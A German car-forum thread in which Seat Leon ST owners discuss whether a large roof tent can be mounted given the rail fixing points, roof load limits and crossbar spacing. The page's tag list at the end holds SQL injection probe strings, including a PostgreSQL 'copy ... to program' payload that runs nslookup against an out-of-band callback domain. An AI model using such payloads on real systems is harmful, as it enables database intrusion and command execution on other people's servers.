[ST] Dachträger Dachzelt- Bitte um Rat!

Diskutiere Dachträger Dachzelt- Bitte um Rat! im 5F - Allgemein Forum im Bereich Der Leon 3; Hallo, folgendes Problem: Dachzelt soll auf Seat Leon St montiert werden. Ein Abstand der Dachträger firstvon 1,20 cm bei einem größeren...

Leon_Adventure

Beiträge
2
Reaktionen
0
Hallo,

folgendes Problem: Dachzelt soll auf Seat Leon St montiert werden. Ein Abstand der Dachträger
von 1,20 cm bei einem größeren Dachzelt soll dabei eingehalten werden (bei kleinerem Dachzelt 80cm). Die Reling bei meinem Seat hat aber Fixpunkte für Dachträger mit 70cm Abstand. Ist eine anderweitige Montage möglich? Mir konnte in der Werkstatt keiner helfen. Danke im Voraus.
 
25.02.2020
#1

Anzeige

Gast

Schau mal hier: Dachträger Dachzelt- Bitte um Rat! . Dort wird jeder fündig!

Stefman

Beiträge
36
Reaktionen
26
Ich kann dir zumindest sagen, dass ich den Dachträger nicht an den Einkerbungen fixiert hatte. Trotzdem bin ich mit drei Fahrräder nach Italien und zurück gekommen.
 
DSG-Pilot

DSG-Pilot

Beiträge
2.590
Reaktionen
2.350
Der SEAT Leon ST hat, wenn ich richtig informiert bin, eine Dachlast von 75 kg. Dies bitte beachten.
 
ChrisEngel

ChrisEngel

Moderator
Beiträge
7.233
Reaktionen
2.951
Da wird mir aber übel, wenn ich mir diesen Blödsinn auf der Seite durchlese! 😱 Das ist aber mal GANZ gefährlich, was die dort auf der Seite schreiben und zeugt nicht gerade von Sachverstand.
Bei Menschen auf dem Auto von einer statischen Last zu sprechen ist echt schon grob fahrlässig. 🙄

Allgemein muss das so oder so von Fall zu Fall betrachtet werden. Im Zweifel sollte man sich entsprechendes von Seat bestätigen lassen, diese Bestätigung wird man so aber keinesfalls bekommen.
 
  • Gefällt mir
Reaktionen: DSG-Pilot
Eric_

Eric_

Beiträge
463
Reaktionen
226
Sicher ist die Last mit Menschen auf dem Dach nicht komplett statisch. Daher sollte man ein Dachzelt auch nur zum Schlafen und nicht zum Sportv*geln nutzen. Dass man da nicht drinnen rumturnen soll versteht sich von selbst, und mit dem Gewicht der Personen sollte man natürlich auch aufpassen.
Im Vergleich zu den Kräften, die bei der Fahrt, vor allem in Gefahrensituationen (Gefahrenbremsung, Ausweichmanöver, etc. ) auftreten können, sind die dynamischen Kräfte beim der (sachgemäßen) Nutzung des Dachzeltes aber doch eher gering.
Eine Bestätigung von Seat wird man nicht bekommen dass es geht, wie auch.
Sinnvoll ist es auf jeden Fall, die Querträger direkt über den Fahzeugsäulen zu positionieren für eine direktere Krafteinleitung. Einige Dachzelte bieten auch die Möglichkeit mehr als nur 2 Querträger zu nutzen. Mit 4 Querträgern verteilt sich die Last besser über die Dachlänge. Allerding ist die Reling des Leon ja nicht gerade, sondern hat eine Wölbung. Mehr als 2 Querträger liegen damit also nie auch gleicher Höhe. Hier müsste man an der Befestigung des Zeltbodens einen Höhenausgleich realisieren.

vgl.: Dachzelte fürs Auto: Preis, Modelle, Dachlast - autobild.de
Die Dachlast gibt nur jenes Gewicht an, das maximal auf dem Auto transportiert werden kann. Eine Unterscheidung zwischen dynamischer und statistischer Dachlast gibt es nicht. Das heißt: Es wird kein Unterschied zwischen der Dachbeladung, mit der man noch sicher fahren kann und jener, die das Auto bei Stillstand aushält. Und somit gibt es auch keinen zweiten Maximalwert, mit wie viel Kilogramm das Dach eines stehenden Autos belastet werden darf. Autohersteller geben somit keine Garantie, wenn ein Dachzelt genutzt undt die Dachlast überschritten wird, und ein Schaden entsteht. Tipp vom TÜV SÜD: Das Dachzelt selbst sollte mit ausreichend vielen Querträgern für eine gleichmäßige Verteilung der Last auf der Dachrehling sorgen. Als Richtwert sind etwa alle 70 bis 80 Zentimeter in Ordnung.
 
  • Gefällt mir
Reaktionen: xl8lx

metalmomo

Beiträge
53
Reaktionen
34
Ich kann dir zumindest sagen, dass ich den Dachträger nicht an den Einkerbungen fixiert hatte. Trotzdem bin ich mit drei Fahrräder nach Italien und zurück gekommen.
Das finde ich schon mir Fahrradträger grenzwertig, mit so einem Dachzeltklotz wäre noch leichtsinniger. Die Einkerbungen machen Sinn, da der Träger dann kraftschlüssig hält und nicht nur durch Reibung. Im Zweifel muss man sich dann wohl damit abfinden, dass manche Dachzelte schlicht zu groß sind, um sie sicher auf einem Kombi der Kompaktklasse zu nutzen...
 
Eric_

Eric_

Beiträge
463
Reaktionen
226
Die Einkerbungen machen Sinn, da der Träger dann kraftschlüssig hält und nicht nur durch Reibung.
sogar Formschlüssig

Im Zweifel muss man sich dann wohl damit abfinden, dass manche Dachzelte schlicht zu groß sind, um sie sicher auf einem Kombi der Kompaktklasse zu nutzen...
Alternativ gibt es Dachzelte, die sich noch mit 2 bis 4 Beinen neben dem Fahzeug (auf eine Seite/ rechts+links der Motorhaube / hinter dem Fahrzeug) auf dem Boden Abstützen.
 
Zuletzt bearbeitet:
deus8

deus8

Beiträge
714
Reaktionen
119
Von den Standart Dachträgern werden die FIX Punkte doch überhaupt nicht benutzt🤔
 

Leon_Adventure

Beiträge
2
Reaktionen
0
Danke für die Antworten. Über die Dachlast bin ich informiert. Wir werden uns jetzt für das kleinere Zelt entscheiden um kein Risiko einzugehen. Die gewölbte Reling macht das sonst alles nicht einfacher die Last auf die Säulen zu verteilen. Danke Euch!
 
deus8

deus8

Beiträge
714
Reaktionen
119
Aber die Dach Reling verteilt doch die Dachlast auf die Holme.
Lass dich nicht verunsichern.
Kein Hersteller würde ein Dachzelt verkaufen wenn es nicht gehen würde.
Hier im Forum brauchst du niemanden zu fragen. Es besteht praktisch Lebensgefahr.

Dabei hat niemand Erfahrung damit.
 
ChrisEngel

ChrisEngel

Moderator
Beiträge
7.233
Reaktionen
2.951
Meine mehrwöchige Reise durch Australien mit einem Geländefahrzeug und Dachzelt bieten mir keinerlei Erfahrungen zu einem Zelt auf dem Leon. Stimmt.
Das liegt aber daran, dass Fahrzeuge solcher Bauart nicht für Dachzelte geeignet sind, weswegen man so etwas in der Regel auf Fahrzeugen findet, deren Dachabstützung zum Fahrzeug wesentlich steiler verläuft.....Geländewagen z.B..... diese haben dann auch eine entsprechende Dachlast.
Wenn beim Leon die Last in die B-Säulen geleitet wird, schepperts gewaltig, wenn die Scheiben bersten ;) Und die A-Säulen können dadurch, dass sie so flach sind, auch keine Kräfte aufnehmen. Wenn die Frontscheibe dann berstet, schepperts noch mehr.
 

collegeblock

Beiträge
7
Reaktionen
1
Also wir fahren auf unserem ST schon seit 2 Jahren mit dem Dachzelt auf Urlaube und Festivals.
Dachzelt ist 210 lang und 140 breit. Dachlast wird mit Trägern und Zeug im Dachzelt eingehalten.
Das ich mit dem Leon nicht ins Outback fahre sollte jedem klar sein da beim offroad Fahren ganz andere Kräfte aufs Fahrzeug wirken.

Lg
 

collegeblock

Beiträge
7
Reaktionen
1
Auf wieviele Grundträger setzt du das Zelt, 2 oder mehr? Nimmst du den Abstand, der durch die beiden Fixpunkte vorgegeben ist, oder setzt du die Grundträger mit einem größeren Abstand?
2, habe den Abstand minimal vergrößert.
Wir passen aber dann auch auf das wir nicht an einem Ende zu 2. sitzen zum Beispiel, also Gewichtsverteilung eher mittig beim Sitzen
 
  • Gefällt mir
Reaktionen: Eric_
Thema:

Dachträger Dachzelt- Bitte um Rat!

Dachträger Dachzelt- Bitte um Rat! - Ähnliche Themen

  • Auswahl der Thule Dachbox für Leon ST | maximale Länge

    Auswahl der Thule Dachbox für Leon ST | maximale Länge: Hallo zusammen, ich plane den Kauf einer Thule Dachbox. Die Dachbox soll dabei maximal groß sein, aber die Kofferraumklappe noch vollständig...
  • SC Dachträger

    SC Dachträger: Hallo, ich habe einen Leon SC 3türer ohne Panorama Dach. Möchte mir eine Dachbox anschaffen. Ich stelle mir die Frage, Thule gibt vor, das noch...
  • Dachträger für Leon 5f bj. 2013. Welche passen?

    Dachträger für Leon 5f bj. 2013. Welche passen?: Hallo, Leider blicke ich gerade absolut nicht durch, welchen dachträger ich benötige. Ich will ihn nicht allzu oft nutzen. 3-4 mal ein mtb...
  • Original Dachträger Leon ST

    Original Dachträger Leon ST: Hi, bin verzweifelt. Wollte gerade zum ersten Mal den Original Seat Dachträger auf meinen Leon bauen. Bei dem vorderen Träger ging der...
  • [ST] Dachträger

    [ST] Dachträger: Guten morgen zusammen! Ich habe seit kurzen meinem ST mit Dachreling. Nun suche ich passende Träger für den kleinen Geldbeutel, da mir die aus...
  • [ST] Dachträger - Ähnliche Themen

  • Auswahl der Thule Dachbox für Leon ST | maximale Länge

    Auswahl der Thule Dachbox für Leon ST | maximale Länge: Hallo zusammen, ich plane den Kauf einer Thule Dachbox. Die Dachbox soll dabei maximal groß sein, aber die Kofferraumklappe noch vollständig...
  • SC Dachträger

    SC Dachträger: Hallo, ich habe einen Leon SC 3türer ohne Panorama Dach. Möchte mir eine Dachbox anschaffen. Ich stelle mir die Frage, Thule gibt vor, das noch...
  • Dachträger für Leon 5f bj. 2013. Welche passen?

    Dachträger für Leon 5f bj. 2013. Welche passen?: Hallo, Leider blicke ich gerade absolut nicht durch, welchen dachträger ich benötige. Ich will ihn nicht allzu oft nutzen. 3-4 mal ein mtb...
  • Original Dachträger Leon ST

    Original Dachträger Leon ST: Hi, bin verzweifelt. Wollte gerade zum ersten Mal den Original Seat Dachträger auf meinen Leon bauen. Bei dem vorderen Träger ging der...
  • [ST] Dachträger

    [ST] Dachträger: Guten morgen zusammen! Ich habe seit kurzen meinem ST mit Dachreling. Nun suche ich passende Träger für den kleinen Geldbeutel, da mir die aus...
  • Schlagworte

    testing

    ,

    testing' AND 2*3*8=6*8 AND '8Qap'='8Qap

    ,

    testing" AND 2*3*8=6*8 AND "8wYD"="8wYD

    ,
    testing%' AND 2*3*8=6*8 AND 'XlV7'!='XlV7%
    , testing';copy (select '') to program 'nslookup dns.sqli.\013405.1898-26548.1898.aedca.\1.bxss.me, dachzelt seat leon